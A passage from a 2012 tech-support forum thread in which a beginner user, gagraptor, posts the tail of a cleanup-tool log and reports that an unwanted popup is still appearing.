Post-Run: 29,280,116,736 bytes free
.
- - End Of File - - 443FBEB5CCBB3C0435B8375034C71986

Last edited by gagraptor; 30-May-2012 at 12:33 AM..
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
29-May-2012, 02:07 PM #15
The popup is still there, not gone yet.